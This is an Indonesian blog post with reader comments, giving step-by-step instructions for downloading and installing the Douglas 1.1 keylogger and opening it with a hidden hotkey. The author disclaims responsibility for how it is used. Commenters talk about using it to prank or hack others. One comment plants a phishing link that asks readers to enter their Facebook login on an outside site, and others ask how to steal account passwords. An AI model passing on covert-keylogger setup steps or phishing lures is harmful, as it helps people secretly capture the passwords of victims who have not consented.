Search

Loading...
Wednesday, March 31

postheadericon Cara memasang Keylogger

Disini saya ingin menjelaskan cara memasang Keylogger di komputer anda. Sekedar share info aj, buat anda yang ingin tahu. Terserah anda mau digunakan untuk hal apa saja, semua diluar tanggung jawab saya, saya hanya mau berbagi sedikit informasi ini buat anda. :)

Bagi yang belum punya aplikasi Keylogger, silahkan didownload disini atau disini gratis.

Keylogger yang saya punya ini Keylogger Douglas 1.1

Caranya :

1. Setelah anda download file zip diatas, terus extract ke komputer anda
2. Buka folder DOUGLAS_EN lalu klik file Install.exe untuk melakukan proses penginstalan.
3. Pada proses penginstalan, anda akan diminta untuk memasukkan password untuk aplikasi ini. Password inilah yang akan selalu anda gunakan untuk mengakses aplikasi ini.
4. Setelah proses selesai, tekan kombinasi tombol CTRL+ALT+SHIFT+F9 pada keyboard anda, jika aplikasi Keylogger terbuka, berarti anda berhasil menginstal aplikasi Keylogger ke komputer anda.
5. Selamat menggunakan. ^_^

Please write your comment in comment box below... ^_^

Thanks...

Source Reference http://id-facebook.blogspot.com

16 comments:

1234 said...

ngak bisa permanen di komputer
setelah komputer restrat hilang dah keylogger.
jadi percuma masang ini.

Dragon said...

wehh.. gak support Windows 7 nih!

AAN said...

Wah kayaknya mantab nie buat jahilin orang

Anonymous said...

kalau Lo mau hack facebook oRanG yanG lo benCi cLicK situs ini http://h1.ripway.com/wk121741/ lalu login FB mu disitu lalu liaT pesan yang masuk disiTu ada caRa hack facebook yanG baik!!!!!!!! inGaT harus login lewat siTus itu ok Trimmssss

Anonymous said...

gmn cara hack fb orang..?

Anonymous said...

to anonymous> alih-alih mau bantu org tpi jgn suka bohongi org bro! tuh sama aja kita kasihkan password kita sama elo! lol

rx_robo said...

kontol u panjang taik.....

Akbar GreenCyber said...

ahhaha
tuch d blog loe tai, udah loe psang virus phising
atau keyloger. dan kalo gw login keh blog loe
pass ama e-mail gw bisa terekam
jadi enak dech ...!!!
mw dunk
tapi maap
anti hackker !!!!

zhanaz45 said...

Mao coba dulu ahh..

A*K*O*J*10 said...

asli nie

Anonymous said...

windows 7 work 100%

Anonymous said...

KK Gimana Kalau Pasang Keyloger Untuk Di Pasangkan Di Blogger Kalau Orang Mau Downloadnya Bisa Keliatan Username Dan Passwordnya...?

Anonymous said...

pake mata dewa aja gan yaitu WH permanent aakakakakakak

Anonymous said...

Taeeeekkkk..
ngk bisa di gunakannnnn.

download film said...

info menarik mas, dan saya suka artikel nya ini, dan juga ulasan yg cukup bagus. salam kenal dari mico dari batam islands, dan bagi teman2 yg suka dengan film box office terbaru silakan kunjungi websitenya, karena bisa didownload gratis loe, dan terimakasih untuk adminnya juga loe, keep blogging for better world.makasi

Anonymous said...

gk bisa digunakan